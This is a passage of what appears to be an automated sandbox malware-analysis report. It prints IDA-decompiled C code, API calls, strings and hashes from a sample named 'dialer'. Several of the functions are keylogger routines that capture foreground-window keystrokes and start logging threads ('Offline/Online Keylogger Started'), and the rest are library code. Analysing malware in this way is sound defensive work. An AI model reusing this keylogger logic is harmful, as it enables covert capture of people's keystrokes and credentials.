										__eflags = _t104;
										if(_t104 == 0) {
											_t105 = _v48;
											__eflags =  *((intOrPtr*)(_t105 + 8)) - 0xb;
											if( *((intOrPtr*)(_t105 + 8)) > 0xb) {
												_t173 =  *(_t145 + 0x150);
											} else {
												_t173 =  *(_t145 + 0x14c);
											}
											__eflags = _t152 - 1;
											if(_t152 != 1) {
												L91:
												_t155 =  *_t173 & 0x0000ffff;
												__eflags = _t155;
												if(_t155 == 0) {
													goto L112;
												}
												_t146 = _v40;
												while(1) {
													__eflags =  *_t183;
													if( *_t183 <= 0) {
														goto L112;
													}
													_t173 =  &(_t173[1]);
													 *( *_t146) = _t155;
													 *_t146 =  &(( *_t146)[0]);
													 *_t183 =  *_t183 - 1;
													_t155 =  *_t173 & 0x0000ffff;
													__eflags = _t155;
													if(_t155 != 0) {
														continue;
													}
													goto L112;
												}
											} else {
												__eflags =  *_t183;
												if( *_t183 <= 0) {
													goto L91;
												}
												_t180 = _v40;
												 *((short*)( *_t180)) =  *_t173;
												 *_t180 =  *_t180 + 2;
												 *_t183 =  *_t183 - 1;
											}
											goto L112;
										}
										__eflags = _t104 != 5;
										if(_t104 != 5) {
											goto L108;
										}
										_t153 = _t152;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x79);
											goto L111;
										}
										_t153 = _t153;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x59);
										goto L111;
									}
									if(__eflags == 0) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L75:
											_push(0x64);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L75;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x61);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x41);
										goto L111;
									}
									__eflags = _t95 - 0x27;
									if(_t95 == 0x27) {
										_t110 = _t152 & 0x80000001;
										__eflags = _t110;
										if(__eflags < 0) {
											__eflags = (_t110 - 0x00000001 | 0xfffffffe) + 1;
										}
										_t179 =  &(_t179[_t152]);
										if(__eflags == 0) {
											_t159 =  *_t179 & 0x0000ffff;
											__eflags = _t159;
											if(_t159 == 0) {
												goto L28;
											}
											_t174 = _v40;
											while(1) {
												__eflags =  *_t183;
												if( *_t183 == 0) {
													goto L113;
												}
												_t111 = 0x27;
												_t179 =  &(_t179[1]);
												__eflags = _t159 - _t111;
												if(_t159 == _t111) {
													goto L113;
												}
												 *( *_t174) = _t159;
												 *_t174 =  &(( *_t174)[0]);
												 *_t183 =  *_t183 - 1;
												_t159 =  *_t179 & 0x0000ffff;
												__eflags = _t159;
												if(_t159 != 0) {
													continue;
												}
												goto L113;
											}
										}
										continue;
									}
									__eflags = _t95 - 0x41;
									if(_t95 == 0x41) {
										L41:
										_t116 = E0044C0C1(_t145, _t179, _t183, _t179, L"am/pm");
										__eflags = _t116;
										if(_t116 != 0) {
											_t117 = E0044C0C1(_t145, _t179, _t183, _t179, L"a/p");
											_pop(_t153);
											__eflags = _t117;
											if(_t117 == 0) {
												_v28 =  &(_t179[3]);
											}
										} else {
											_t153 =  &(_t179[5]);
											_v28 =  &(_t179[5]);
										}
										_push(0x70);
										goto L111;
									}
									__eflags = _t95 - 0x48;
									if(_t95 == 0x48) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L55:
											_push(0x48);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L55;
										}
										goto L108;
									}
									__eflags = _t95 - 0x4d;
									if(_t95 == 0x4d) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L50:
											_push(0x6d);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L50;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x62);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x42);
										goto L111;
									}
									__eflags = _t95 - 0x61;
									if(_t95 != 0x61) {
										goto L108;
									}
									goto L41;
								}
								goto L28;
							}
							_t203 = _v33;
							if(_v33 == 0) {
								_t133 = L00440FE7(_t165, _t184, __eflags,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147, 0);
							} else {
								_t133 = E00441129(_t165, _t184, _t203,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147);
							}
							_t181 = _t184;
							_t177 = _t133 - 1;
							if(_t177 <= 0) {
								L27:
								E004304BD(_t184);
								goto L28;
							} else {
								_t148 = _v32;
								_t185 = _v40;
								while( *_t148 > 0) {
									_t135 =  *_t181;
									_t181 = _t181 + 2;
									 *( *_t185) = _t135;
									 *_t185 =  &(( *_t185)[0]);
									 *_t148 =  *_t148 - 1;
									_t177 = _t177 - 1;
									if(_t177 > 0) {
										continue;
									}
									break;
								}
								_t184 = _v28;
								goto L27;
							}
						}
						asm("sbb eax, eax");
						_t137 = _t129 & _t175 + 0x00000008;
						_t165 = _t175 + 8;
						if((_t129 & _t175 + 0x00000008) > 0x400) {
							__eflags = _t175 - _t165;
							asm("sbb eax, eax");
							_t186 = E0043E61D(_t165, _t137 & _t165);
							_v28 = _t186;
							_pop(_t165);
							__eflags = _t186;
							if(__eflags == 0) {
								goto L30;
							}
							 *_t186 = 0xdddd;
							L14:
							_t184 = _t186 + 8;
							goto L18;
						}
						asm("sbb eax, eax");
						E00450080();
						_t186 = _t188;
						_v28 = _t186;
						if(_t186 == 0) {
							goto L30;
						}
						 *_t186 = 0xcccc;
						goto L14;
					}
				}
			}

0x0043fc74
0x0043fc74
0x0043fc7c
0x0043fc83
0x0043fc89
0x0043fc8c
0x0043fc93
0x0043fc96
0x0043fc9c
0x0043fc9f
0x0043fca3
0x0043fca6
0x0043fcaa
0x0043fcad
0x0043fcc4
0x0043fcaf
0x0043fcb2
0x0043fcbc
0x0043fcb4
0x0043fcb4
0x0043fcb4
0x0043fcb2
0x0043fcd1
0x00000000
0x0043fcd7
0x0043fce0
0x0043fce7
0x0043fcf1
0x0043fcf4
0x0043fcfc
0x0043fd04
0x0043fd0c
0x0043fd13
0x0043fd19
0x0043fd20
0x0043fd22
0x0043fd38
0x0043fd46
0x0043fd24
0x0043fd31
0x0043fd31
0x0043fd4b
0x0043fd4f
0x00000000
0x0043fd55
0x0043fd55
0x0043fd58
0x0043fd5d
0x0043fd61
0x0043fdbb
0x0043fdbb
0x0043fdbd
0x0043fdbd
0x0043fdc2
0x0043fe42
0x0043fe44
0x0043fe49
0x004400c0
0x004400c0
0x004400c0
0x004400c3
0x004400c6
0x00000000
0x00000000
0x0043fe52
0x0043fe55
0x0043fe2c
0x0043fe2e
0x0043fe41
0x0043fe41
0x0043fe57
0x0043fe5b
0x0043fe5b
0x0043fe5d
0x0043fe60
0x0043fe62
0x0043fe65
0x0043fe65
0x0043fe68
0x0043fe69
0x0043fe69
0x0043fe6e
0x0043fe71
0x0043fe74
0x0043fe77
0x0043fe7a
0x0043ffaf
0x0043ffaf
0x0043ffb2
0x0044007f
0x0044007f
0x00440082
0x0044009b
0x0044009f
0x0044009f
0x004400a1
0x004400a1
0x004400b1
0x004400b6
0x004400b9
0x004400bb
0x004400d6
0x00000000
0x004400dc
0x004400bd
0x004400bd
0x00000000
0x004400bd
0x00440084
0x00440084
0x00440087
0x00000000
0x00000000
0x00440089
0x00440089
0x0044008c
0x00440091
0x00440094
0x00440097
0x00000000
0x00440097
0x0043ffb8
0x0043ffb8
0x0043ffbb
0x0044006b
0x0044006b
0x0044006e
0x00440077
0x0044007b
0x0044007b
0x00000000
0x0044007b
0x00440070
0x00440070
0x00440073
0x00000000
0x00000000
0x00000000
0x00440075
0x0043ffc1
0x0043ffc1
0x0043ffc4
0x00440057
0x00440057
0x0044005a
0x00440063
0x00440067
0x00440067
0x00000000
0x00440067
0x0044005c
0x0044005c
0x0044005f
0x00000000
0x00000000
0x00000000
0x00440061
0x0043ffca
0x0043ffca
0x0043ffcd
0x0043fff6
0x0043fff9
0x0043fffd
0x00440007
0x0043ffff
0x0043ffff
0x0043ffff
0x0044000d
0x00440010
0x0044002c
0x0044002c
0x0044002f
0x00440032
0x00000000
0x00000000
0x00440038
0x0044003b
0x0044003b
0x0044003e
0x00000000
0x00000000
0x00440042
0x00440045
0x00440048
0x0044004b
0x0044004d
0x00440050
0x00440053
0x00000000
0x00000000
0x00000000
0x00440055
0x00440012
0x00440012
0x00440015
0x00000000
0x00000000
0x00440017
0x0044001f
0x00440022
0x00440025
0x00440025
0x00000000
0x00440010
0x0043ffcf
0x0043ffd2
0x00000000
0x00000000
0x0043ffd9
0x0043ffd9
0x0043ffdc
0x0043ffef
0x00000000
0x0043ffef
0x0043ffdf
0x0043ffdf
0x0043ffe2
0x00000000
0x00000000
0x0043ffe8
0x00000000
0x0043ffe8
0x0043fe80
0x0043ff7e
0x0043ff7e
0x0043ff81
0x0043ffa4
0x0043ffa8
0x0043ffa8
0x00000000
0x0043ffa8
0x0043ff83
0x0043ff83
0x0043ff86
0x00000000
0x00000000
0x0043ff88
0x0043ff88
0x0043ff8b
0x0043ff9d
0x00000000
0x0043ff9d
0x0043ff8d
0x0043ff8d
0x0043ff90
0x00000000
0x00000000
0x0043ff96
0x00000000
0x0043ff96
0x0043fe86
0x0043fe89
0x0043ff2b
0x0043ff2b
0x0043ff30
0x0043ff36
0x0043ff36
0x0043ff37
0x0043ff3a
0x0043ff40
0x0043ff43
0x0043ff46
0x00000000
0x00000000
0x0043ff4c
0x0043ff4f
0x0043ff4f
0x0043ff52
0x00000000
0x00000000
0x0043ff5a
0x0043ff5b
0x0043ff5e
0x0043ff61
0x00000000
0x00000000
0x0043ff69
0x0043ff6c
0x0043ff6f
0x0043ff71
0x0043ff74
0x0043ff77
0x00000000
0x00000000
0x00000000
0x0043ff79
0x0043ff4f
0x00000000
0x0043ff3a
0x0043fe8f
0x0043fe92
0x0043fea7
0x0043fead
0x0043feb4
0x0043feb6
0x0043ff11
0x0043ff17
0x0043ff18
0x0043ff1a
0x0043ff1f
0x0043ff1f
0x0043feb8
0x0043feb8
0x0043febb
0x0043febb
0x0043ff22
0x00000000
0x0043ff22
0x0043fe94
0x0043fe97
0x0043fef1
0x0043fef1
0x0043fef4
0x0043ff00
0x0043ff04
0x0043ff04
0x00000000
0x0043ff04
0x0043fef6
0x0043fef6
0x0043fef9
0x00000000
0x00000000
0x00000000
0x0043fefb
0x0043fe99
0x0043fe9c
0x0043fec0
0x0043fec0
0x0043fec3
0x0043fee6
0x0043feea
0x0043feea
0x00000000
0x0043feea
0x0043fec5
0x0043fec5
0x0043fec8
0x00000000
0x00000000
0x0043feca
0x0043feca
0x0043fecd
0x0043fedf
0x00000000
0x0043fedf
0x0043fecf
0x0043fecf
0x0043fed2
0x00000000
0x00000000
0x0043fed8
0x00000000
0x0043fed8
0x0043fe9e
0x0043fea1
0x00000000
0x00000000
0x00000000
0x0043fea1
0x00000000
0x004400cc
0x0043fdc4
0x0043fdcb
0x0043fdf4
0x0043fdcd
0x0043fddc
0x0043fddc
0x0043fdfb
0x0043fdfd
0x0043fe00
0x0043fe25
0x0043fe26
0x00000000
0x0043fe02
0x0043fe02
0x0043fe05
0x0043fe08
0x0043fe0f
0x0043fe12
0x0043fe15
0x0043fe18
0x0043fe1b
0x0043fe1d
0x0043fe20
0x00000000
0x00000000
0x00000000
0x0043fe20
0x0043fe22
0x00000000
0x0043fe22
0x0043fe00
0x0043fd68
0x0043fd6a
0x0043fd6c
0x0043fd74
0x0043fd99
0x0043fd9b
0x0043fda5
0x0043fda7
0x0043fdaa
0x0043fdab
0x0043fdad
0x00000000
0x00000000
0x0043fdb3
0x0043fd94
0x0043fd94
0x00000000
0x0043fd94
0x0043fd78
0x0043fd7c
0x0043fd81
0x0043fd83
0x0043fd88
0x00000000
0x00000000
0x0043fd8e
0x00000000
0x0043fd8e
0x0043fd4f

APIs

__alloca_probe_16.LIBCMT ref: 0043FD7C
__freea.LIBCMT ref: 0043FE26
__freea.LIBCMT ref: 0043FE44

Strings

a/p, xrefs: 0043FF0B
am/pm, xrefs: 0043FEA7

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16
String ID: a/p$am/pm
API String ID: 3509577899-3206640213
Opcode ID: f3ea7faec0368573f7a4b5aabf75a21b5c73b3e40bf63262c19b50c698bab57a
Instruction ID: efad13f334c18f36a16d29ae4c57d2eb1f842dae350e8b0578a31a05ad4cd3d2
Opcode Fuzzy Hash: f3ea7faec0368573f7a4b5aabf75a21b5c73b3e40bf63262c19b50c698bab57a
Instruction Fuzzy Hash: 81D11531D00206DAEB289F68D855BBBB7B0FF09300F24516BEA019B351D37D8D95CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004089BC, Relevance: 9.1, APIs: 6, Instructions: 54
keyboardthreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004089BC(void* __ecx, intOrPtr _a4) {
				long _v8;
				void _v38;
				short _v40;
				char _v296;
				void* __ebx;
				void* __edi;
				struct HKL__* _t20;
				void* _t30;
				signed int _t32;
				void* _t36;

				_t30 = __ecx;
				E00431810(_t36,  &_v296, 0, 0x100);
				_v40 = 0;
				_t32 = 7;
				memset( &_v38, 0, _t32 << 2);
				asm("stosw");
				_t20 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(),  &_v8));
				GetKeyState(0x10);
				GetKeyboardState( &_v296);
				ToUnicodeEx( *(_t30 + 0x4c),  *(_t30 + 0x50),  &_v296,  &_v40, 0x10, 0, _t20);
				E0040425F(_t30, _a4,  &_v40);
				return _a4;
			}

0x004089d3
0x004089d8
0x004089e5
0x004089eb
0x004089ec
0x004089ee
0x00408a02
0x00408a0c
0x00408a19
0x00408a35
0x00408a42
0x00408a50

APIs

GetForegroundWindow.USER32(00000000,?,00000000), ref: 004089F0
GetWindowThreadProcessId.USER32(00000000,?), ref: 004089FB
GetKeyboardLayout.USER32 ref: 00408A02
GetKeyState.USER32 ref: 00408A0C
GetKeyboardState.USER32(?), ref: 00408A19
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00408A35

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
String ID:
API String ID: 3566172867-0
Opcode ID: b02ccbf7f0dc03c4f6c19e4d88d394f0c81c31efefca9dfcc189d7371c4d50d7
Instruction ID: ab76f315eabbce1fdb121dfd98bae8f760d40ea8c637dec96147df679fa50a93
Opcode Fuzzy Hash: b02ccbf7f0dc03c4f6c19e4d88d394f0c81c31efefca9dfcc189d7371c4d50d7
Instruction Fuzzy Hash: 6B110072900208BBDB109FE4DD49FDA77ACEB4C746F100465FA04E6191EA75AA54CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00440972, Relevance: 9.0, APIs: 6, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E00440972(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x46a1e0; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E0043DFD9(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = L00440F8E(_t25, _t36, __eflags,  *0x46a1e0, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E004407E4(_t25, _t31, 0x46b654);
							L0043EE85(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						L0043EE85();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E0043E5DA(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x46a1e0; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E0043DFD9(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = L00440F8E(_t27, _t37, __eflags,  *0x46a1e0, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E004407E4(_t27, _t32, 0x46b654);
									L0043EE85(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								L0043EE85();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = L00440F38(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = L00440F38(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

APIs

GetLastError.KERNEL32(00000000,?,00434E55,?,?,?,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 00440976
_free.LIBCMT ref: 004409A9
_free.LIBCMT ref: 004409D1
SetLastError.KERNEL32(00000000,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 004409DE
SetLastError.KERNEL32(00000000,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 004409EA
_abort.LIBCMT ref: 004409F0

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: dadde158ca9c573d59bdef272f977015ec66c3c9339893d4cb0a1fd73f822a76
Instruction ID: a31c51b4580a199ad3038d9a62967fb3efd0f479f4e7b394ce716d3395aa3357
Opcode Fuzzy Hash: dadde158ca9c573d59bdef272f977015ec66c3c9339893d4cb0a1fd73f822a76
Instruction Fuzzy Hash: ACF0F976141A0037F61127666C06E5F1225ABC1BAAF24012FFA14A22D3EE7CCC2245AF

Uniqueness

Uniqueness Score: -1.00%

Function 0041B671, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0041B671(short* __edx) {
				signed int _v8;
				intOrPtr _v12;
				short* _v16;
				short _v20;
				char _v24;
				intOrPtr _v28;
				char _v80;
				void* _t45;
				void* _t48;
				void* _t59;
				intOrPtr _t62;
				void* _t64;
				intOrPtr _t65;
				void* _t67;
				char _t68;
				char _t69;
				char* _t70;
				signed int _t71;
				short* _t72;
				signed int _t76;
				char* _t79;
				char* _t81;
				intOrPtr _t82;
				char* _t85;
				void* _t86;
				void* _t89;
				intOrPtr _t91;
				char* _t92;
				intOrPtr* _t93;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;

				_v16 = __edx;
				_v8 = _v8 & 0;
				_v20 = 0;
				_v12 = 0;
				_v24 = 0;
				_v28 = L0040BE3C();
				_t85 = "TLS_AES_128_GCM_SHA256";
				if(__edx == 0) {
					L37:
					return 0;
				}
				_t45 = L00438E20(_t85, "ALL", 3);
				_t97 = _t96 + 0xc;
				if(_t45 == 0) {
					L36:
					return 1;
				}
				_t48 = L00438E20(_t85, "DEFAULT", 7);
				_t98 = _t97 + 0xc;
				if(_t48 == 0) {
					goto L36;
				} else {
					goto L3;
				}
				do {
					L3:
					_t70 = _t85;
					_t86 = E004310F0(_t85, 0x4657e0);
					if(_t86 != 0) {
						_t76 = _t86 - _t70;
						L8:
						if(_t76 <= 0x31) {
							if(_t86 != 0) {
								_t89 = _t86 - _t70;
								L15:
								E0043A900( &_v80, _t70, _t89);
								_t98 = _t98 + 0xc;
								_t11 = _t89 - 1; // -1
								_t90 =  ==  ? _t11 : _t89;
								_t71 = 0;
								 *((char*)(_t95 + ( ==  ? _t11 : _t89) - 0x4c)) = 0;
								if(_v28 <= 0) {
									L20:
									_t72 = _v16;
									_t91 = _v12;
									goto L21;
								}
								_t93 = 0x4608fc;
								while(1) {
									_t15 = _t93 - 4; // 0x465d34
									_t59 = L00438E20( &_v80,  *_t15, 0x31);
									_t98 = _t98 + 0xc;
									if(_t59 == 0) {
										break;
									}
									_t67 = L00438E20( &_v80,  *_t93, 0x31);
									_t98 = _t98 + 0xc;
									if(_t67 == 0) {
										break;
									}
									_t71 = _t71 + 1;
									_t93 = _t93 + 0xc;
									if(_t71 < _v28) {
										continue;
									}
									goto L20;
								}
								_t82 = _v20;
								if(_t82 >= 0x12b) {
									goto L37;
								}
								_t76 = _t71 * 0xc;
								_t72 = _v16;
								 *((char*)(_t72 + _t82 + 4)) =  *((intOrPtr*)(_t76 + 0x460900));
								 *((char*)(_t72 + _t82 + 5)) =  *((intOrPtr*)(_t76 + 0x460901));
								_t62 =  *((intOrPtr*)(_t76 + 0x460900));
								_v20 = _t82 + 2;
								if(_t62 == 0x13) {
									L34:
									_v8 = 1;
									L35:
									_t91 = 1;
									_v12 = 1;
									goto L21;
								}
								if(_t62 != 0xc0) {
									L30:
									if(_v8 != 0) {
										L32:
										if(_v24 == 0) {
											_v24 = 1;
										}
										goto L35;
									}
									_t64 = E004310F0( &_v80, "ECDSA");
									_pop(_t76);
									if(_t64 != 0) {
										goto L34;
									}
									goto L32;
								}
								_t65 =  *((intOrPtr*)(_t76 + 0x460901));
								if(_t65 == 0xb4 || _t65 == 0xb5) {
									goto L34;
								} else {
									goto L30;
								}
							}
							_t92 = _t70;
							_t76 =  &(_t92[1]);
							do {
								_t68 =  *_t92;
								_t92 =  &(_t92[1]);
							} while (_t68 != 0);
							_t89 = _t92 - _t76;
							goto L15;
						}
						_t89 = 0x31;
						goto L15;
					}
					_t79 = _t70;
					_t81 =  &(_t79[1]);
					do {
						_t69 =  *_t79;
						_t79 =  &(_t79[1]);
					} while (_t69 != 0);
					_t76 = _t79 - _t81;
					goto L8;
					L21:
					_t85 = _t86 + 1;
				} while (_t86 != 0);
				if(_t91 != 0) {
					_push(_t76);
					 *_t72 = _v20;
					 *((char*)(_t72 + 0x154)) = 1;
					E00418C8B(_t72, _v8, _v24, _t76, 1);
				}
				return _t91;
			}

APIs

_strncpy.LIBCMT ref: 0041B723

Strings

ECDSA, xrefs: 0041B805
DEFAULT, xrefs: 0041B6BC
TLS_AES_128_GCM_SHA256, xrefs: 0041B695, 0041B6A9, 0041B6C1, 0041B6D7, 0041B71D, 0041B721
ALL, xrefs: 0041B6A4

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: _strncpy
String ID: ALL$DEFAULT$ECDSA$TLS_AES_128_GCM_SHA256
API String ID: 2961919466-1012175531
Opcode ID: 78fa12b9f6d9d132d950df1abb8da17d93647f655761b6c6588f7c57589f5f63
Instruction ID: 78e21791db2732ee694d72da95f641054b580d27861932b645a039a5d5b4fa6f
Opcode Fuzzy Hash: 78fa12b9f6d9d132d950df1abb8da17d93647f655761b6c6588f7c57589f5f63
Instruction Fuzzy Hash: 2E513735D043099BDF20AAA888857FFB7B9DB44304F14406FEC51A7382E7798986C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 00408744, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70
threadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00408744(void* __ecx, char _a4) {
				char _v28;
				char _v32;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* _t21;
				void* _t39;
				signed int _t41;
				void* _t43;

				_t43 = (_t41 & 0xfffffff8) - 0x1c;
				_push(_t21);
				_t39 = __ecx;
				_t2 = _t39 + 0x60; // 0x46c3b0
				 *((char*)(__ecx + 0x49)) = 1;
				L00409DD4(_t2,  &_a4);
				_t47 =  *0x46a9d4 - 0x32;
				_t35 = "Offline Keylogger Started";
				if( *0x46a9d4 != 0x32) {
					E00402064(_t21,  &_v28, "Offline Keylogger Started");
					_t43 = _t43 - 0x18;
					E00416C32(_t43,  &_v32);
					E00409636(_t21, _t39, _t47);
					L00401FA7();
				}
				_t44 = _t43 - 0x18;
				E00402064(_t21, _t43 - 0x18, _t35);
				E00402064(_t21, _t44 - 0x18, "[Info]");
				E004165D8(_t21, _t35);
				CreateThread(0, 0, 0x40884d, _t39, 0, 0);
				if( *_t39 == 0) {
					CreateThread(0, 0, E00408832, _t39, 0, 0);
				}
				CreateThread(0, 0, E0040885C, _t39, 0, 0);
				return L00401ED0();
			}

0x0040874a
0x00408750
0x00408752
0x00408756
0x00408759
0x0040875d
0x00408762
0x00408769
0x0040876e
0x00408775
0x0040877a
0x00408783
0x0040878a
0x00408793
0x00408793
0x00408798
0x0040879e
0x004087ad
0x004087b2
0x004087cc
0x004087d0
0x004087dc
0x004087dc
0x004087e8
0x004087f8

APIs

CreateThread.KERNEL32(00000000,00000000,0040884D,0046C350,00000000,00000000), ref: 004087CC
CreateThread.KERNEL32(00000000,00000000,00408832,0046C350,00000000,00000000), ref: 004087DC
CreateThread.KERNEL32(00000000,00000000,0040885C,0046C350,00000000,00000000), ref: 004087E8

Part of subcall function 00409636: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046C350), ref: 00409644
Part of subcall function 00409636: wsprintfW.USER32 ref: 004096C5
Part of subcall function 00409636: SetEvent.KERNEL32(00000000,00000000), ref: 004096EF

Strings

Offline Keylogger Started, xrefs: 00408769, 00408770, 0040879D
[Info], xrefs: 004087A8

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CreateThread$EventLocalTimewsprintf
String ID: Offline Keylogger Started$[Info]
API String ID: 3534694722-3531117058
Opcode ID: a0d024ad8c9949b0735535353f752cbf97b3fdb91e3ab862432188692a5b43dd
Instruction ID: 917e057f81a48fe8b587d187e59d983f8dfdf23781fe50dc9a014371862e48e5
Opcode Fuzzy Hash: a0d024ad8c9949b0735535353f752cbf97b3fdb91e3ab862432188692a5b43dd
Instruction Fuzzy Hash: AB1198A25003083AD224B7369D86DBF3A5DDA81398F80453FF985221C3DE785E08C6FA

Uniqueness

Uniqueness Score: -1.00%

Function 004093AF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65
threadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004093AF(void* __ecx) {
				char _v28;
				void* __ebx;
				void* __edi;
				void* _t7;
				void* _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t30 = __ecx;
				_t36 =  *((char*)(__ecx + 0x4a));
				if( *((char*)(__ecx + 0x4a)) == 0) {
					_t28 = "Online Keylogger Started";
					 *((char*)(__ecx + 0x4a)) = 1;
					E00402064(_t18,  &_v28, "Online Keylogger Started");
					_t32 = _t31 - 0x18;
					E00416C32(_t32,  &_v28);
					E00409636(_t18, _t30, _t36);
					L00401FA7();
					_t33 = _t32 - 0x18;
					E00402064(_t18, _t32 - 0x18, "Online Keylogger Started");
					E00402064(_t18, _t33 - 0x18, "[Info]");
					E004165D8(_t18, _t28);
					if( *((intOrPtr*)(_t30 + 0x49)) == 0) {
						if( *_t30 == 0) {
							CreateThread(0, 0, E00408832, _t30, 0, 0);
						}
						CreateThread(0, 0, E0040885C, _t30, 0, 0);
					}
					return CreateThread(0, 0, E0040886B, _t30, 0, 0);
				}
				return _t7;
			}

APIs

Part of subcall function 00409636: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046C350), ref: 00409644
Part of subcall function 00409636: wsprintfW.USER32 ref: 004096C5
Part of subcall function 00409636: SetEvent.KERNEL32(00000000,00000000), ref: 004096EF

Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2

CreateThread.KERNEL32(00000000,00000000,Function_00008832,?,00000000,00000000), ref: 0040942F
CreateThread.KERNEL32(00000000,00000000,Function_0000885C,?,00000000,00000000), ref: 0040943B
CreateThread.KERNEL32(00000000,00000000,Function_0000886B,?,00000000,00000000), ref: 00409447

Strings

Online Keylogger Started, xrefs: 004093C4, 004093CD, 004093F7
